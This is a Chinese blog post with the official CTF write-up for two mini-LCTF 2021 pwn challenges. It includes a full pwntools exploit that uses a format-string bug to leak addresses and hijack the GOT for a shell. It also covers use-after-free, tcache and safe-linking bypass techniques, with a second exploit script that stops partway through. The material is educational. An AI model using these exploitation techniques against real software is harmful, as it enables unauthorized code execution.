【CTF题解NO.00008】mini-LCTF 2021 official write up by arttnba3

最新推荐文章于 2023-05-07 21:54:02 发布
最新推荐文章于 2023-05-07 21:54:02 发布
阅读量711 收藏
点赞数
分类专栏: CTF题解 文章标签: 内存泄漏 信息安全 python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/arttnba3/article/details/116810766
版权

0x00.绪论

很高兴能和RX大哥和协会的其他师傅一起出了这一次 minilCTF 2021 的题,虽然说只出了两道比较简单的题233333,不过还是希望大家能够喜欢()

点开下方查看题解👇

0x01.Baby Repeater - fmtstr + got hijack

预期是利用格式化字符串泄露 libc 和 程序加载基地址,之后利用格式化字符串劫持 got 表,比较方便的就是改 printf 为 system,只用修改3个字节,也看到有人选择改为 one_gadget 的,基本上都在预期内

解题思路

漏洞点比较明显,一个可以无限使用的格式化字符串漏洞

简单测一下,格式化字符串是栈上的第八个参数

checksec一下,发现no relro,那就直接利用格式字符串漏洞泄露程序加载基地址与 libc 基址后改 printf@got 为 system 后输入 ;sh 就可以拿到 shell 了

exp如下:

from pwn import *
p = process('./baby_repeater')
e = ELF('./baby_repeater')
libc = ELF('./libc-2.31.so')

p.sendline("%107$p")
p.recvuntil(b"> Your sentence: ")
main_addr = int(p.recvuntil(b'\n', drop = True), 16) - 42
elf_base = main_addr - e.sym['main']
log.success('elf base: ' + hex(elf_base))

p.sendline("%111$p")
p.recvuntil(b"> Your sentence: ")
libc_base = int(p.recvuntil(b'\n', drop = True), 16) - libc.sym['__libc_start_main'] - 243
log.success('libc base: ' + hex(libc_base))

printf_got = elf_base + e.got['printf']
sys_addr = libc_base + libc.sym['system']
sys_low = sys_addr & 0xffff
sys_high = (sys_addr >> 16)  & 0xff

payload = b'%' + str(sys_high - 15).encode() + b'c%12$hhn'
payload += b'%' + str(sys_low - sys_high).encode() + b'c%13$hn'
payload = payload.ljust(4 * 8, b'\x00')
payload += p64(printf_got + 2)
payload += p64(printf_got)

p.sendline(payload)
p.sendline(';sh')

p.interactive()

0x02. easytcache - Use After Free + safe-linking bypass + ORW (+ FSOP)

这道题校内没人出…只有一个校外的师傅做出来了,还非预期了…

BB:

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Hz2IpHD9-1621009387347)(https://i.loli.net/2021/05/15/Oqpem3yrg2UJlYC.png)]

程序分析

使用如下指令编译,保护全开,扣光符号表

$ g++ easytcache.cpp -o easytcache -fstack-protector-all -z now -z noexecstack -pie -s

在开头的init_state()函数中设置了沙箱,目的是让选手只能通过orw来获得flag

题目提供了分配、编辑、打印、释放堆块的功能,以及一个手动调用exit函数退出的功能

同时题目限制只能分配5个chunk,只能释放3次,超出这个限制便会抛出A3LibException中止程序

漏洞点在于释放堆块时没有将堆块指针置0,但是libc版本为2.31,有着tcache key,无法直接double free

题目本身有个逻辑漏洞,在 deleteNote() 函数中虽然会检测堆块是否已释放,但是会在检测之前使用取反的方式改变标志位,因此可以在改变标志位后使用 edit 功能清除 tcache key,之后完成doule free

解题思路

题目限制了只能分配5个 chunk,每一次分配都需要精打细算,为了能够达到更多次的任意地址写,所以考虑直接劫持 tcache 结构体

首先通过double free后打印泄漏出堆基址,之后就是 edit 后分配到 tcache 结构体,修改 counts 全满后将 tcache free 进 unsorted bin 后打印就可以泄漏出栈基址,此时我们还剩下两次 malloc 的机会,0 次 free 的机会,不过好在我们已经控制了 tcache 结构体,可以直接分配堆块到我们想要的地方
需要注意的是自 libc2.32 起新增了 safe-linking 机制(本题为 2.33),对于 tcache 与 fastbin 中的 chunk 的 next 指针都会与自身地址右移 12 位后的值进行异或,但是 tcache_entry 中存放的仍然为未加密指针

最常规的办法就是改 __malloc_hook 为 one_gadget 以get shell,但是这一题限制了系统调用,只能进行orw

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-fu8jXAVw-1621009387349)(https://i.loli.net/2021/04/22/EA873jmk2bIy4ca.png)]

解法一:__environ泄露栈地址在栈上构造ROP进行ORW

__environ 这个变量中保存着栈上地址,我们可以通过这个变量获取栈上地址,随后就可以分配一个位于栈上的 chunk ,最后就是常规的通过 ROP 进行 ORW

exp如下:

#!/usr/bin/python3
from pwn import *

context.log_level = 'DEBUG'
context.arch = 'amd64'

p = process(['./ld-2.33.so', './easytcache'], env={
   'LD_PRELOAD':'./libc.so.6'})#p = remote('pwn.woooo.tech', 10071)#
e = ELF('./easytcache')
libc = ELF('./libc.so.6')
one_gadget = 0xe6e73

def cmd(choice:int):
    p.recvuntil(b"Your choice: ")
    p.sendline(str(choice).encode())

def new(size:int):
    cmd(1)
    p.recvuntil(b"size?")
    p.sendline(str(size).encode())

def edit(index:int, content):
    cmd(2)
    p.recvuntil(b"index?")
    p.sendline(str(index).encode())
    p.recvuntil(b"content?")
    p.send(content)

def dump(index:int):
    cmd(3)
    p.recvuntil(b"index?")
    p.sendline(str(index).encode())
    p
最低0.47元/天 解锁文章
arttnba3
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
CTF资料.rar-------
02-16
ctf入门
从gyctf_2020_some_thing_exceting复习double free机制(glibc-2.23源码分析向
Tw0的博客
02-10 155
当我们进行double free攻击的时候,如果有一个管理堆块存储着多个下级chunk的指针,那么需要特别注意和管理chunk同样大小的chunk的申请和释放,因为free fastbin chunk的时候,会对其fd指针进行修改,从而导致程序寻找的堆块出现偏差。
[mini LCTF 2023] 西电的部分
weixin_52640415的博客
05-07 4828
order 爆破
i春秋2020新春战役PWN之document(绕过tcache的double free检测)
seaaseesa的博客
02-27 3150
Document 首先,检查一下程序的保护机制 然后,我们用IDA分析一下,经典的增删改查程序 Delete功能没有清空指针,存在UAF漏洞 Create功能的size不可控 UAF无法修改到*heap处的内容,也就是next指针的值 Create功能最多允许创建7个堆 题目给我们的glibc版本为2.29,存在tcache机制,且增加了对tcache dou...
CTF题解NO.00002】minilCTF 2020 - write up by arttnba3
arttnba3的博客
08-18 847
CTF题解NO.00002】minilCTF 2020 - write up by arttnba30x00.绪论0x01.Sign inStarting Point0x02.PWNhelloret2text执行过程:ret2shellcode修正过程:高阶解法:栈迁移ezsc程序分析Alphanumeric Shelllcodeeasycpp程序分析Use After Freenoleakpwnchroottime_management 0x00.绪论 mini-LCTF,前身是makerCTF,是西电
CTF】记录一次CTF比赛的Writeup(附题目下载地址)
TeamsSix 的 CSDN 空间
09-25 3368
0x00 前言 最近因为省赛快来了,因此为实验室的小伙伴准备了这次比赛,总共10道题目,考虑到大多数小伙伴都刚从大一升到大二,因此整体难度不高,当然有几道难度还是有的。 题目大多数都是从网上东找西找的,毕竟我也是个菜鸟呀,还要给他们出题,我太难了。 废话不多说,直接上Writeup吧,以下题目的文件下载地址可以在我的公众号(TeamsSix)回复CTF获取。 0x01 隐写 1 flag:steg...
59-59.渗透测试-CTF题目案例.mp4
05-10
59-59.渗透测试-CTF题目案例.mp4
66-66.渗透测试-CTF题目分析.mp4
最新发布
05-10
66-66.渗透测试-CTF题目分析.mp4
CTF-100题.-天天练习-学习
11-01
CTF-100题.-----------------天天练习------------------学习 100小题,试例练习
CTF指南-常规的CTF题目解析.pptx
10-12
CTF指南-常规的CTF题目解析
LCTF-2017-web-wp(持续更新)
weixin_33898876的博客
11-21 316
【1】萌萌哒报名系统 题目提示使用IDE开发的报名系统,大概使用的事phpstorm,使用工具扫了一下 我们发现存在.idea文件泄露,查看.idea/workspace.xml源码可以发现存在xdcms2333.zip 下载下来解压发现源码,这里我定位到几处关键代码: //register.php $sth = $pdo->prepare('INSERT INTO use...
environ泄露栈地址+orw+uaf
FUCKING12的博客
10-08 606
这个题开了沙箱,有uaf。利用思路:借助environ泄露栈地址,利用uaf将orw写到栈地址上。首先enviro泄露的栈地址在edi函数里面是rsp所指向的地址。然后,在edit执行leave前栈已经是我们想要的结构了。正如我们所看到了payload3那样。然后接下来就是ret到orw处。
某单位2021CTF初赛Writeup(部分)
更多知识欢迎访问我的博客园:https://www.cnblogs.com/2ha0yuk7on/
11-08 4606
Web Web1 当时没截图,找了别人拍的照贴一下。。。 是一道简单题,不过考的知识点蛮多的。 Referer绕过、User-Agent绕过、XFF绕过之后,进行代码审计 这里的知识点: 使用科学计数法绕过取值大于1 intval() 不能用于 object,否则会产生 E_NOTICE 错误并返回 1 使用数组绕过类型判断 <?php echo intval(42); // 42 echo intval(4.2);
CTF资料-0x0002】PWN简易Linux堆利用入门教程by arttnba3
arttnba3的博客
02-25 2228
CTF资料-0x0002】简易Linux堆利用入门教程by arttnba3老生常谈,[GITHUB BLOG ADDR](https://archive.next.arttnba3.cn/2021/02/24/%E3%80%90CTF%E8%B5%84%E6%96%99-0x0002%E3%80%91%E7%AE%80%E6%98%93Linux%E5%A0%86%E5%88%A9%E7%94%A8%E5%85%A5%E9%97%A8%E6%95%99%E7%A8%8Bby%20arttnba3/),请
2.24-2.28的fsop
qq_51474381的博客
04-11 421
2.24-2.28的fsop: 2.23的fsop对这个版本段的glibc是无效的,多加的保护机制如下: 新版本(libc2.24以上)的防御机制会检查vtable的合法性,不能再像之前那样改vatable为堆地址,但是_IO_str_jumps是一个符合条件的 vtable,改 vtable为 _IO_str_jumps即可绕过检查。 _IO_str_jumps是一个方向,使用比较简单,这里就只讲这个方向了。 利用: 新版本(libc2.24以上)的防御机制会检查vtable的合法性,不能.
CTF题解NO.00001】西安电子科技大学网络与信息安全学院2020年网络空间安全专业实验班选拔考试 - write up by arttnba3
arttnba3的博客
08-18 3229
CTF题解NO.00001】西安电子科技大学网络与信息安全学院2020年网络空间安全专业实验班选拔考试 - write up by arttnba30x00.绪论0x01.PWN (AK)cmcc_stackpwn_canary0x02.reverseBabyre0x03.mischelloencrypt 0x00.绪论 最近这几天网络与信息安全学院搞网络空间安全专业的实验班考试,作为蒟蒻的我抱着试一试的心态混入了考试的大佬之中XDD 说不定再过几天我就从计科院人变成网信院人le 0x01.PWN (
CTF杂项-BUUCTF竞赛真题WriteUp(2)
道阻且长,行则将至。
05-05 6978
文章目录前言No.1 Git动图分解提取信息No.2 隐藏文件提取与爆破N0.3 Base64编码还原图片No.4 winhex修改图片大小No.5 编辑器查看图片隐写 前言 为了划水过几天的“ 红帽杯 ” 网络安全大赛,学习并记录下 BUUCTF 平台的杂项部分题目,因为去年参加“ 强网杯 ”网络安全大赛发现杂项类型的题目还是可以争取得分的,也希望过几天运气好点吧… No.1 Git动图分解提取信息 下载附件发现是一个金三胖的动图,闪烁着红色 flag 字体(因三胖的图片被平台列为违规项目所以无法展示)。
CTF联系-妹子的陌陌
mini_sailing的博客
04-19 1096
这道题对于萌新来说有点复杂,但是提示一直都有,而且挺明显的,所以也不算太难吧,贴个题目链接http://120.24.86.145:8002/misc/momo.jpg打开是一张妹子的图片,习惯性地保存用记事本打开,当然什么都没发现啦~哪有那么简单然后再试试把文件改成压缩包,成功啦,可是文件加密,需要密码,尝试多次后发现密码居然就在图片上,放大图片就可以看到了,“喜欢我吗.”这个提示还是很良心的。...
搭建CTF比赛平台
飞花的世界
08-12 9454
http://123.206.21.163 这个是我按照 这个人的代码,修改后的。说实话,这个平台写的很精简,也很棒。代码啥的也很舒服,可惜就是没文档,所以最开始的时候,花了我两天时间大致阅读完了,知道哪一比分怎么改,干嘛的。上面的网址是效果。 接下来放他的github地址 PS 下面有演示图片,但是因为是异步加载图片,所以有点慢,等下就好。这个比赛平台做的真的挺好的 https://git...
2019 CTF题目下载及Write-up解析
CTF题目下载及write up(难度较大)-b64_c3VuJTIwYm95-it720.docx 本文档主要是关于CTF安全大赛的题目下载和write up,涵盖了多个题目和解题步骤。 **CTF安全大赛** CTF(Capture The Flag)是指在网络安全领域中...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值